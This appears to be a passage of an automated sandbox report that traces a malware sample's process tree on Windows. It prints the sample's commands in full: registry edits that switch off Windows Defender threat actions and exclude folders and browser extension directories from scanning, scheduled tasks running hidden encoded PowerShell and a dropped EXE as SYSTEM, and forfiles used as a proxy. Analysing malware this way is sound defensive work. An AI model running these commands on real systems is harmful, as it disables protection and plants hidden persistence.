                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                        3⤵
                                                                                                          PID:4436
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                          3⤵
                                                                                                            PID:2400
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                            3⤵
                                                                                                              PID:3180
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                              3⤵
                                                                                                                PID:1896
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:2516
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:4888
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:3620
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:2396
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:1976
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:1272
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:4960
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:1732
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                              2⤵
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:1084
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:468
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                    4⤵
                                                                                                                                      PID:1428
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:64
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:1232
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:2324
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:3836
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:2268
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:696
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:1228
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4208
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4756
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3776
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3332
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3656
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:1824
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4228
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3976
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2640
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:428
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:3408
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:1184
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /CREATE /TN "gjBVBKsSV" /SC once /ST 03:16:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                        PID:4896
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /run /I /tn "gjBVBKsSV"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:1732
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /DELETE /F /TN "gjBVBKsSV"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1204
                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 08:30:41 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\JlRbEHt.exe\" GH /bEpvdidZd 385118 /S" /V1 /F
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                            PID:3752
                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            schtasks /run /I /tn "XyyyteIMwZeutaZuw"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1272
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:2708
                                                                                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:3368
                                                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:2268
                                                                                                                                                                              • C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\JlRbEHt.exe
                                                                                                                                                                                C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\JlRbEHt.exe GH /bEpvdidZd 385118 /S
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Drops Chrome extension
                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                PID:3916
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:1736
                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4804
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:952
                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:1564
                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4176
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:568
                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:456
                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4300
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:2708
                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:3644
                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:696
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:4476
                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:1640
                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:2356
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2216
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                      PID:232
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:4604
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:4992
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:2576
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:4960
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:1032
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                PID:3108
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                  PID:3776
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\EYJRPr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:4552
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\lJBKgQu.xml" /RU "SYSTEM"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:940
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /END /TN "FPieTEPPuEmJrhC"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:4872
